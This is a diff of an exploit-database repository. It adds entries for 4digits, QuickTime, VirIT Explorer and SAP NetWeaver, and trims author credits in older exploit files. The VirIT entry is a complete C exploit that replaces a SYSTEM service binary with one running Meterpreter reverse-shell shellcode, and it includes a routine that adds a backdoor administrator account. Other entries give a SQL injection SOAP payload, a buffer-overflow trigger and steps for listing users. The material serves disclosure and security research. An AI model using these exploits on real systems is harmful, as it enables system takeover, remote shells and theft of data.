DB: 2016-05-20

platforms/linux/dos/39842.txt

@@ -0,0 +1,140 @@
+4digits 1.1.4 Local Buffer Overflow Privilege Escalation ( if setuid/setgid )
+
+Discoverd by N_A , N_A [at] tutanota.com
+Downloaded and tested upon Kali Linux
+
+Vendor has been notified.
+
+
+Description
+-------------
+
+4digits is a guess-the-number puzzle game. It's also called Bulls and Cows, and in China people simply call it Guess-the-Number. The game's objective is to guess a four-digit number in 8 times.
+
+https://sourceforge.net/projects/fourdigits/
+
+
+Vulnerability
+--------------
+
+4digits version 1.1.4 and possibly earlier versions suffer from a buffer overflow vulnerability where possible code execution can occur and privileges can be escalated if this is setuid/setgid.
+
+The vulnerability is found within the 4digits-text binary version of the game.
+An environment variable is not checked thoroughly before it is passed to the function save_score() when a user wins at the game. An attacker may be able to execute arbitary code:
+
+4digits-text.c:
+
+/* save current score in the score file */
+void save_score(const int time_taken) {
+    time_t tm = time(NULL);
+    struct tm *today = localtime(&tm);
+    char tmpbuffer[129];
+    today = localtime(&tm);
+    char appdata_dir[4096]; //XXX why _PC_PATH_MAX is only 4?  <----- The buffer we over flow
+    const char *score_filename = "4digits.4digits.scores";
+    strcpy(appdata_dir, getenv("HOME"));    <------ Collecting "HOME"
+    strcat(appdata_dir, "/.4digits/");
+    char *scorefile = (char*)malloc(strlen(appdata_dir) + strlen(score_filename) + 1);
+    if(!scorefile)
+        err_exit(_("Memory allocation error.\n"));
+    strcpy(scorefile, appdata_dir);      <------ Vulnerability here
+    strcat(scorefile, score_filename);
+
+
+The save_score() function is called when the user successfully wins at the game and this is when the vulnerability becomes active, as per example below:
+
+First, set the HOME variable as below
+
+$ export HOME=`perl -e 'print"A"x5100'`
+
+Then , load the game into GDB ( if you want to debug it in real time )
+
+$ gdb 4digits-text
+GNU gdb (Debian 7.10-1+b1) 7.10
+Copyright (C) 2015 Free Software Foundation, Inc.
+License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
+This is free software: you are free to change and redistribute it.
+There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
+and "show warranty" for details.
+This GDB was configured as "i586-linux-gnu".
+Type "show configuration" for configuration details.
+For bug reporting instructions, please see:
+<http://www.gnu.org/software/gdb/bugs/>.
+Find the GDB manual and other documentation resources online at:
+<http://www.gnu.org/software/gdb/documentation/>.
+For help, type "help".
+Type "apropos word" to search for commands related to "word"...
+Reading symbols from 4digits-text...done.
+(gdb) run
+
+
+To activate the bug you must run the game and then win/guess the right number:
+
+
+(gdb) run
+Starting program: /home/N/4digits-1.1.4/4digits-text 
+Input a 4-digit number:1234
+2A0B       7 times left.
+Input a 4-digit number:7934
+1A1B       6 times left.
+Input a 4-digit number:8235
+3A0B       5 times left.
+Input a 4-digit number:8236
+3A0B       4 times left.
+Input a 4-digit number:8239
+3A0B       3 times left.
+Input a 4-digit number:8237
+4A0B       2 times left.
+You win! :) Used 120 sec.
+
+Program received signal SIGSEGV, Segmentation fault.
+__strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50
+50  ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S: No such file or directory.
+
+
+(gdb) i r
+eax            0x0  0
+ecx            0x1  1
+edx            0x5  5
+ebx            0x13f6  5110
+esp            0xbfffd424  0xbfffd424
+ebp            0xbfffe4f8  0xbfffe4f8
+esi            0x0  0
+edi            0x41414141  1094795585
+eip            0xb7e854b6  0xb7e854b6 <__strlen_sse2_bsf+22>
+eflags         0x10287  [ CF PF SF IF RF ]
+cs             0x73  115
+ss             0x7b  123
+ds             0x7b  123
+es             0x7b  123
+fs             0x0  0
+gs             0x33  51
+
+
+(gdb) backtrace
+#0  __strlen_sse2_bsf () at ../sysdeps/i386/i686/multiarch/strlen-sse2-bsf.S:50
+#1  0x08048f8f in save_score (time_taken=1094795585) at 4digits-text.c:183
+#2  0x41414141 in ?? ()
+#3  0x41414141 in ?? ()
+#4  0x41414141 in ?? ()
+#5  0x41414141 in ?? ()
+#6  0x41414141 in ?? ()
+#7  0x41414141 in ?? ()
+#8  0x41414141 in ?? ()
+#9  0x41414141 in ?? ()
+#10 0x41414141 in ?? ()
+#11 0x41414141 in ?? ()
+#12 0x41414141 in ?? ()
+#13 0x41414141 in ?? ()
+#14 0x41414141 in ?? ()
+#15 0x41414141 in ?? ()
+#16 0x41414141 in ?? ()
+#17 0x41414141 in ?? ()
+#18 0x41414141 in ?? ()
+#19 0x41414141 in ?? ()
+#20 0x41414141 in ?? ()
+#21 0x41414141 in ?? ()
+#22 0x41414141 in ?? ()
+
+
+By N_A , N_A [at] tutanota.com

platforms/osx/dos/39839.txt

@@ -0,0 +1,68 @@
+#####################################################################################
+
+Application: Apple Quicktime
+
+Platforms: OSX
+
+Author: Francis Provencher of COSIG
+
+Website: http://www.protekresearchlab.com/
+
+Twitter: @COSIG_ @protekresearch
+
+CVE-2016-1848
+
+#####################################################################################
+
+1) Introduction
+2) Report Timeline
+3) Technical details
+4) POC
+
+#####################################################################################
+
+===============
+1) Introduction
+===============
+
+QuickTime is an extensible multimedia framework developed by Apple Inc., capable of handling various formats of digital video, picture, sound, panoramic images, and interactivity. The classic version of QuickTime is available for Windows Vista and later, as well as Mac OS X Leopard and later operating systems. A more recent version, QuickTime X, is currently available on Mac OS X Snow Leopard and newer.
+
+(https://en.wikipedia.org/wiki/QuickTime)
+
+#####################################################################################
+
+============================
+2) Report Timeline
+============================
+
+2016-03-14: Francis Provencher from COSIG report issue to Apple security team;
+2016-03-21: Apple security team  confirmed this issue;
+2016-05-17: Apple fixed this issue;
+
+https://support.apple.com/en-us/HT206567
+#####################################################################################
+
+============================
+3) Technical details
+============================
+
+This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple QuickTime.
+
+User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
+
+The specific flaw exists within the parsing of invalid data in the mdat atom. An attacker can use this flaw to read outside the
+
+allocated buffer, which could allow for the execution of arbitrary code in the context of the current process.
+
+#####################################################################################
+
+===========
+
+4) POC
+
+===========
+
+http://protekresearchlab.com/exploits/COSIG-2016-19.mov
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39839.zip
+
+###############################################################################

platforms/php/webapps/12387.sh

@@ -1,7 +1,7 @@
 #
 # WebEssence 1.0.2 Multiple Vulnerabilities
 #
-# Bugs found by white_sheep, R00T_ATI and epicfail
+# Bugs found by white_sheep, r00t and epicfail
 # for Debug|Track session @ Backtrack|italia community conference
 # www.backtrack.it
 # 

platforms/php/webapps/12643.pl

@@ -11,7 +11,7 @@ http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9
 #
 #
 # Example:
-# [simone@simons Advisories]$ hybris chillycms.hy
+# [user@user Advisories]$ hybris chillycms.hy
 # Searching Username... :
 # admin
 # Searching MD5... :

platforms/php/webapps/17613.php

@@ -22,10 +22,7 @@
         FIX: Upgrade to version 3.8.5
 
  	Bug found by: IHTeam
-	Simone `R00T_ATI` Quatrini
-	Marco `white_sheep` Rondini
-	Francesco `merlok` Morucci
-	Mauro `epicfail` Gasperini
+
 	For GetShopped as their security auditors
 
  	This code has been released under the authorization of GetShopped staff.

platforms/php/webapps/2087.php

@@ -1,7 +1,6 @@
 #!/usr/bin/php -q -d short_open_tag=on
 <?
 echo "vbPortal 3.0.2 <= 3.6.0 Beta 1 Remote Command Excution \r\n";
-echo "By R00t[ATI] Mail : havoc1988 [at] gmail [dot] com \r\n";
 echo "Thank you Minus-Power \r\n";
 echo "Thank you rgod for your clear samples \r\n";
 echo "site: http://www.rootshell.net \r\n\r\n";

platforms/php/webapps/28863.txt

@@ -1,5 +1,3 @@
-source: http://www.securityfocus.com/bid/20752/info
-
 MAXdev MD-Pro is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 
 
 An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

platforms/php/webapps/29676.txt

@@ -1,5 +1,3 @@
-source: http://www.securityfocus.com/bid/22728/info
-
 Audins Audiens is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input.
 
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve and overwrite sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

platforms/php/webapps/29677.txt

@@ -1,5 +1,3 @@
-source: http://www.securityfocus.com/bid/22728/info
- 
 Audins Audiens is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input.
  
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve and overwrite sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

platforms/php/webapps/29678.txt

@@ -1,5 +1,3 @@
-source: http://www.securityfocus.com/bid/22728/info
-  
 Audins Audiens is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input.
   
 Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve and overwrite sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.

platforms/php/webapps/4125.txt

@@ -8,7 +8,7 @@
 # Critical   Level : Dangerous
 # Site:      http://sourceforge.net/projects/webdev-webchat/
 # Download:  http://downloads.sourceforge.net/webdev-webchat/webchat-078.zip?modtime=1046649600&big_mirror=0
-# Author:    R00T[ATI]
+# Author:    r00t
 # Contact:   r00t.ati@gmail.com - http://inclusionhunter.altervista.org/index.php
 #
 #########################################################################

platforms/php/webapps/4329.txt

@@ -13,8 +13,6 @@ http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html
 # Download:  http://www.impliedbydesign.com/apps/microcms/microcms.zip
 # Demo site:
 http://www.impliedbydesign.com/micro-cms-content-management-demo.php
-# Author:    R00T[ATI] of notsec
-# Contact:   r00t.ati@notsec.com - http://www.notsec.com
 #
 #########################################################################################
 

platforms/php/webapps/4342.txt

@@ -11,8 +11,6 @@
 # Remote:    Yes
 # Site:      http://www.wsdeluxe.com/nmdeluxe/
 # Download:  http://downloads.sourceforge.net/nmdeluxe/nmdeluxe2.0.0.zip?modtime=1178396844&big_mirror=0
-# Author:    R00T[ATI] of notsec
-# Contact:   r00t.ati@notsec.com - http://www.notsec.com
 #
 #########################################################################################
 

platforms/php/webapps/4378.htm

@@ -56,7 +56,7 @@ ________________________________________________________
 ________________________________________________________
 
 All notsec.com members;
-R00T[ATI] for testing;
+r00t for testing;
 ________________________________________________________
 
 # milw0rm.com [2007-09-08]

platforms/php/webapps/4443.txt

@@ -12,8 +12,6 @@
 # Remote:    Yes
 # Site:      http://www.clansphere.net/
 # Download:  http://sourceforge.net/project/showfiles.php?group_id=95430
-# Author:    R00T[ATI] of IHTeam
-# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
 #
 #########################################################################################
 

platforms/php/webapps/4449.txt

@@ -9,8 +9,6 @@
 #
 # Class:     SQL Injection  # Found:     22/09/2007 # Remote:    Yes # Site:      http://pfa.netsliver.com/
 # Download: http://pfa.netsliver.com/download/download.php?Fichier=pfa-v6.tgz
-# Author:    R00T[ATI] of IHTeam
-# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
 ##########################################################################################
 
 

platforms/php/webapps/4817.txt

@@ -4,8 +4,6 @@
 #
 # Class:     SQL Injection  # Found:     30/12/2007 # Remote:    Yes  # Site:      http://w-agora.net
 # Download:  http://sourceforge.net/project/showfiles.php?group_id=3413
-# Author:    R00T[ATI]
-# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
 #   #########################################################################################
 
         Exploit :

platforms/php/webapps/7780.pl

@@ -6,7 +6,7 @@
 # by Osirys
 # osirys[at]live[dot]it
 # osirys.org
-# Greets: HaVoC, x0r, jay, BlackLight
+# Greets: r00t, x0r, jay, BlackLight
 # lol at athos
 
 # --------------------------------------------------------------

platforms/php/webapps/9407.txt

@@ -9,8 +9,6 @@
 # DORK:      "This site is powered by CMS Made Simple version 1."
 # Site:      http://www.cmsmadesimple.org/
 # Download:  http://s3.amazonaws.com/cmsms/downloads/4033/cmsmadesimple-1.6.2-full.tar.gz
-# Author:    R00T[ATI]
-# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
 ##########################################################################################
 
 Vulnerability:

platforms/php/webapps/9425.sh

@@ -4,7 +4,7 @@
 #       Found by white_sheep on 11/08/2009
 #       Contact: sheewhite@googlemail.com - https://www.ihteam.net
 #       Need magic_quote_gpc Off for RCE and LFI
-#       Thanks to R00T[ATI]
+#       Thanks to r00t
 #
 #               PASSWORD RESET:
 # http://localhost/gazelle/renew.php?user=[username]

platforms/windows/local/39843.c

@@ -0,0 +1,197 @@
+/*
+Full title:			VirIT Explorer Lite & Pro v.8.1.68 Local Privilege Escalation (System)/Arbitrary Code Execution
+Exploit Author:		Paolo Stagno - voidsec@voidsec.com
+Vendor Homepage:	http://www.tgsoft.it
+Version:			VirIT Explorer Lite & Pro v.8.1.68
+Tested on:			Windows 7
+CVE:				TBD
+CVSS v2:          	6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:U/RC:C) - https://nvd.nist.gov/cvss.cfm?calculator&version=2&vector=%28AV:L/AC:L/Au:S/C:C/I:C/A:C/E:H/RL:U/RC:C%29
+Category:			local exploits
+Platform:			windows
+Security Risk:		High
+Date add: 18/05/2016
+
+===
+VirIT Explorer Lite & Pro v.8.1.68 Local Privilege Escalation (SYSTEM
+Privilege)/Arbitrary Code Execution
+
+- Author: Paolo Stagno
+
+Overview
+=========
+Vir.IT eXplorer [1] is an AntiVirus, AntiSpyware and AntiMalware
+software made in Italy and developed by TG Soft S.a.s.
+
+A major flaws exists in the last version of Vir.IT eXplorer, this
+vulnerability allow a local attacker,
+to execute arbitrary code in the context of the application with SYSTEM
+privilege.
+
+Details
+==========
+The flaw resides in the viritsvclite Service due to bad privileges for
+the main Vir.IT folder, by default, any user (even guest) will be able to
+replace, modify or alter the file. This would allow an attacker to
+inject code or replace the executable and have it run in the context
+of the system.
+
+This would allow a complete compromise of the system on which the
+antivirus was installed; an attacker can replace the executable, reboot
+the system and it would then compromise the machine. As NT
+AUTHORITY\SYSTEM is the highest privilege level on a Windows machine,
+this allows a total control and access to the system.
+
+Services: viritsvclite
+Folder: %SYSTEMDRIVE%\VEXPLite
+Executable: %SYSTEMDRIVE%\VEXPLite\viritsvc.exe
+
+[2] icacls.exe VEXPLite
+C:\VEXPLite Everyone:(OI)(CI)(F) <=================== Vulnerable
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(OI)(CI)(RX)
+NT AUTHORITY\Authenticated Users:(I)(M)
+NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
+
+Successfully processed 1 files; Failed processing 0 files
+
+icacls.exe viritsvc.exe
+viritsvc.exe Everyone:(I)(F) <=================== Vulnerable
+BUILTIN\Administrators:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Users:(I)(RX)
+NT AUTHORITY\Authenticated Users:(I)(M)
+
+Successfully processed 1 files; Failed processing 0 files
+
+With this flaws in mind I wrote the exploit which is able to obtain NT
+AUTHORITY\SYSTEM via a meterpreter shell.
+
+Exploit
+==========
+https://gist.github.com/VoidSec/9971092829dd1fec146e1595843aae65
+https://www.youtube.com/watch?v=5a09efEvjTk (video proof)
+
+Remediation
+==========
+Remove the permissions on the VEXPLite folder, all of its files and on
+the viritsvc.exe Service executables to allow only
+privileged users to alter the files, apply vendor patch once distributed.
+
+Footnotes
+==========
+[1] http://www.tgsoft.it/english/prodotti_eng.asp
+[2] https://technet.microsoft.com/en-us/library/cc753525%28WS.10%29.aspx
+---
+
+*/
+#include <windows.h>
+#include <stdio.h>
+
+#define small_sleep 5000
+#define big_sleep 180000
+
+SERVICE_STATUS ServiceStatus;
+SERVICE_STATUS_HANDLE hStatus;
+
+void ServiceMain(int argc, char **argv);
+void ControlHandler(DWORD request);
+typedef short (CALLBACK * FuncType) (LPCTSTR);
+
+/*Meterpreter reverse payload (windows/meterpreter/reverse_tcp), replace with your own*/
+unsigned char r_shell[] = 
+"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
+"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
+"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
+"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
+"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
+"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
+"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
+"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
+"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
+"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
+"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
+"\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xc0\xa8\x01\x8a\x68\x02"
+"\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
+"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
+"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00"
+"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
+"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
+"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
+"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00"
+"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
+"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff"
+"\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00"
+"\x53\xff\xd5";
+
+int Spawn_Shell(){
+	//Spawn the reverse shell
+    int (*func)();
+    func = (int (*)()) r_shell;
+    (int)(*func)();	
+}
+
+int Add_Admin(){
+	//ADD VoidSec:secret to Local Administrators
+	system("net user VoidSec secret /ADD");
+	system("net localgroup Administrators VoidSec /ADD"); return 0;
+}
+
+int main(){
+	SERVICE_TABLE_ENTRY ServiceTable[2];
+	ServiceTable[0].lpServiceName = "viritsvclite";
+	ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION) ServiceMain;
+	ServiceTable[1].lpServiceName = NULL;
+	ServiceTable[1].lpServiceProc = NULL;
+	StartServiceCtrlDispatcher(ServiceTable);
+
+	return 0;
+}
+
+void ServiceMain(int argc, char **argv) {
+	ServiceStatus.dwServiceType = SERVICE_WIN32;
+	ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
+	ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;
+	ServiceStatus.dwWin32ExitCode = 0;
+	ServiceStatus.dwServiceSpecificExitCode = 0;
+	ServiceStatus.dwCheckPoint = 0;
+	ServiceStatus.dwWaitHint = 0;
+	hStatus = RegisterServiceCtrlHandler("viritsvclite", (LPHANDLER_FUNCTION) ControlHandler);
+	ServiceStatus.dwCurrentState = SERVICE_RUNNING;
+	SetServiceStatus(hStatus, &ServiceStatus);
+	
+	//Big sleep (3m), let Windows start Network, DHCP etc.
+	Sleep(big_sleep);
+	
+	Spawn_Shell();
+	//Add_Admin();
+	
+	//Let our service run instead of kill it (only works with Add_Admin, Spawn_Shell will kill it on exit)
+	/*while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {
+		Sleep(small_sleep);
+	}*/
+		
+	return;
+}
+
+void ControlHandler(DWORD request) {
+	switch (request) {
+		case SERVICE_CONTROL_STOP:
+			ServiceStatus.dwWin32ExitCode = 0;
+			ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+			SetServiceStatus(hStatus, &ServiceStatus);
+		return;
+		case SERVICE_CONTROL_SHUTDOWN:
+			ServiceStatus.dwWin32ExitCode = 0;
+			ServiceStatus.dwCurrentState = SERVICE_STOPPED;
+			SetServiceStatus(hStatus, &ServiceStatus);
+		return;
+		default:
+		break;
+		}
+	SetServiceStatus(hStatus, &ServiceStatus);
+		
+	return;
+}

platforms/xml/webapps/39840.txt

@@ -0,0 +1,168 @@
+Application:  SAP NetWeaver AS JAVA
+Versions Affected:  SAP NetWeaver  AS JAVA 7.1 - 7.5
+Vendor URL:    http://SAP.com
+Bugs:    SQL injection
+Send:     04.12.2015
+Reported: 04.12.2015
+Vendor response:  05.12.2015
+Date of Public Advisory:   09.02.2016
+Reference:   SAP Security Note 2101079
+Author:    Vahagn Vardanyan  (ERPScan)
+
+
+Description
+
+1. ADVISORY INFORMATION
+
+Title: SAP NetWeaver AS JAVA – SQL injection vulnerability
+Advisory ID: [ERPSCAN-16-011]
+Risk: Critical
+Advisory URL: https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/
+Date published: 09.02.2016
+Vendors contacted: SAP
+
+
+2. VULNERABILITY INFORMATION
+
+Class: SQL injection
+
+Impact: Resource consumption
+Remotely Exploitable: Yes
+Locally Exploitable: No
+CVE: 2016-2386
+CVSS Information
+CVSS Base Score v3:  9.1 / 10
+CVSS Base Vector:
+AV : Access Vector (Related exploit range) Network (N)
+AC : Access Complexity (Required attack complexity) Low (L)
+Au : Authentication (Level of authentication needed to exploit) None (N)
+C : Impact to Confidentiality High (H)
+I  : Impact to Integrity High(H)
+A : Impact to Availability None (N)
+
+
+3. VULNERABILITY DESCRIPTION
+
+An SQL injection vulnerability means that a code comprises an SQL
+statement that contains strings that can be altered by an attacker.
+The manipulated SQL statement can be used to gain additional data from
+the database or to modify the information.
+
+
+4. VULNERABLE PACKAGES
+
+SAP NetWeaver AS JAVA 7.1 - 7.5
+
+Other versions are probably affected too, but they were not checked.
+
+
+5. SOLUTIONS AND WORKAROUNDS
+
+To correct this vulnerability, install SAP Security Note 2101079
+
+
+6. AUTHOR
+
+Vahagn Vardanyan  (ERPScan)
+
+
+7. TECHNICAL DESCRIPTION
+
+By exploiting this vulnerability, an internal or external attacker can
+escalate their privileges. This access allows obtaining sensitive
+technical and business-related information stored in the vulnerable
+SAP system.
+
+
+PoC
+
+POST /XXX/UDDISecurityImplBean HTTP/1.1
+Content-Type: text/xml
+
+<SOAP-ENV:Envelope
+xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
+xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
+xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+xmlns:xsd="http://www.w3.org/2001/XMLSchema">
+  XXX
+
+<permissionId>x' AND 1=(SELECT COUNT(*) FROM BC_UDV3_EL8EM_KEY) or
+'1'='1</permissionId>
+
+XXX
+
+</SOAP-ENV:Envelope>
+
+
+8. REPORT TIMELINE
+
+Sent:   04.12.2015
+Reported:    04.12.2015
+Vendor response:   05.12.2015
+Date of Public Advisory:   09.02.2016
+
+
+9. REFERENCES
+
+https://erpscan.com/advisories/erpscan-16-011-sap-netweaver-7-4-sql-injection-vulnerability/
+
+
+10. ABOUT ERPScan Research
+
+The company’s expertise is based on the research subdivision of
+ERPScan, which is engaged in vulnerability research and analysis of
+critical enterprise applications. It has achieved multiple
+acknowledgments from the largest software vendors like SAP, Oracle,
+Microsoft, IBM, VMware, HP for discovering more than 400
+vulnerabilities in their solutions (200 of them just in SAP!).
+
+ERPScan researchers are proud to have exposed new types of
+vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
+nominated for the best server-side vulnerability at BlackHat 2013.
+
+ERPScan experts have been invited to speak, present, and train at 60+
+prime international security conferences in 25+ countries across the
+continents. These include BlackHat, RSA, HITB, and private SAP
+trainings in several Fortune 2000 companies.
+
+ERPScan researchers lead the project EAS-SEC, which is focused on
+enterprise application security research and awareness. They have
+published 3 exhaustive annual award-winning surveys about SAP
+security.
+
+ERPScan experts have been interviewed by leading media resources and
+featured in specialized info-sec publications worldwide. These include
+Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
+Heise, and Chinabyte, to name a few.
+
+We have highly qualified experts in staff with experience in many
+different fields of security, from web applications and
+mobile/embedded to reverse engineering and ICS/SCADA systems,
+accumulating their experience to conduct the best SAP security
+research.
+
+
+11. ABOUT ERPScan
+
+ERPScan is the most respected and credible Business Application
+Security provider. Founded in 2010, the company operates globally and
+enables large Oil and Gas, Financial and Retail organizations to
+secure their mission-critical processes. Named as an ‘Emerging Vendor’
+in Security by CRN, listed among “TOP 100 SAP Solution providers” and
+distinguished by 30+ other awards, ERPScan is the leading SAP SE
+partner in discovering and resolving security vulnerabilities. ERPScan
+consultants work with SAP SE in Walldorf to assist in improving the
+security of their latest solutions.
+
+ERPScan’s primary mission is to close the gap between technical and
+business security, and provide solutions to evaluate and secure SAP
+and Oracle ERP systems and business-critical applications from both,
+cyber-attacks as well as internal fraud. Usually our clients are large
+enterprises, Fortune 2000 companies and managed service providers
+whose requirements are to actively monitor and manage security of vast
+SAP landscapes on a global scale.
+
+We ‘follow the sun’ and function in two hubs, located in the Palo Alto
+and Amsterdam to provide threat intelligence services, agile support
+and operate local offices and partner network spanning 20+ countries
+around the globe.

platforms/xml/webapps/39841.txt

@@ -0,0 +1,159 @@
+Application:SAP NetWeaver AS JAVA
+Versions Affected: SAP NetWeaver  AS JAVA 7.1 - 7.5
+Vendor URL: http://SAP.com
+Bugs:  information disclosure
+Sent:  15.09.2015
+Reported:  15.09.2015
+Vendor response: 16.09.2015
+Date of Public Advisory: 09.02.2016
+Reference: SAP Security Note 2256846
+Author: Vahagn Vardanyan  (ERPScan)
+
+
+Description
+
+1. ADVISORY INFORMATION
+
+Title: SAP NetWeaver AS JAVA – information disclosure vulnerability
+Advisory ID: [ERPSCAN-16-010]
+Risk: Medium
+Advisory URL: https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/
+Date published: 09.02.2016
+Vendors contacted: SAP
+
+
+2. VULNERABILITY INFORMATION
+
+Class: Information disclosure
+Impact: Resource consumption
+Remotely Exploitable: Yes
+Locally Exploitable: No
+CVE: CVE-2016-2388
+
+CVSS Information
+
+CVSS Base Score v3:  5.3  / 10
+CVSS Base Vector:
+AV : Access Vector (Related exploit range) Network (N)
+AC : Access Complexity (Required attack complexity) Low (L)
+Au : Authentication (Level of authentication needed to exploit) None (N)
+C : Impact to Confidentiality Low(N)
+I  : Impact to Integrity None(N)
+A : Impact to Availability None (N)
+
+
+3. VULNERABILITY DESCRIPTION
+
+Anonymous attacker can use a special HTTP request to get information
+about SAP NetWeaver users.
+
+
+4. VULNERABLE PACKAGES
+
+SAP NetWeaver AS JAVA 7.1- 7.5
+
+Other versions are probably affected too, but they were not checked.
+
+
+5. SOLUTIONS AND WORKAROUNDS
+
+To correct this vulnerability, install SAP Security Note  2256846
+
+
+6. AUTHOR
+
+Vahagn Vardanyan  (ERPScan)
+
+
+7. TECHNICAL DESCRIPTION
+
+An attacker can use Information disclosure vulnerability to reveal
+additional information (system data, debugging information, etc) that
+will help him to learn more about a system and to plan further
+attacks.
+
+
+Steps to exploit this vulnerability
+
+1. Open http://SAP:50000/webdynpro/resources/sap.com/XXX/JWFTestAddAssignees#
+page on SAP server
+
+2. Press "Choose" button
+
+3. In the opened window press “Search”
+
+You will get a list of SAP users
+
+
+8. REPORT TIMELINE
+
+Sent:  15.09.2015
+Reported:   15.09.2015
+Vendor response:   16.09.2015
+Date of Public Advisory:   09.02.2016
+
+
+9. REFERENCES
+
+https://erpscan.com/advisories/erpscan-16-010-sap-netweaver-7-4-information-disclosure/
+
+
+10. ABOUT ERPScan Research
+
+The company’s expertise is based on the research subdivision of
+ERPScan, which is engaged in vulnerability research and analysis of
+critical enterprise applications. It has achieved multiple
+acknowledgments from the largest software vendors like SAP, Oracle,
+Microsoft, IBM, VMware, HP for discovering more than 400
+vulnerabilities in their solutions (200 of them just in SAP!).
+
+ERPScan researchers are proud to have exposed new types of
+vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be
+nominated for the best server-side vulnerability at BlackHat 2013.
+
+ERPScan experts have been invited to speak, present, and train at 60+
+prime international security conferences in 25+ countries across the
+continents. These include BlackHat, RSA, HITB, and private SAP
+trainings in several Fortune 2000 companies.
+
+ERPScan researchers lead the project EAS-SEC, which is focused on
+enterprise application security research and awareness. They have
+published 3 exhaustive annual award-winning surveys about SAP
+security.
+
+ERPScan experts have been interviewed by leading media resources and
+featured in specialized info-sec publications worldwide. These include
+Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading,
+Heise, and Chinabyte, to name a few.
+
+We have highly qualified experts in staff with experience in many
+different fields of security, from web applications and
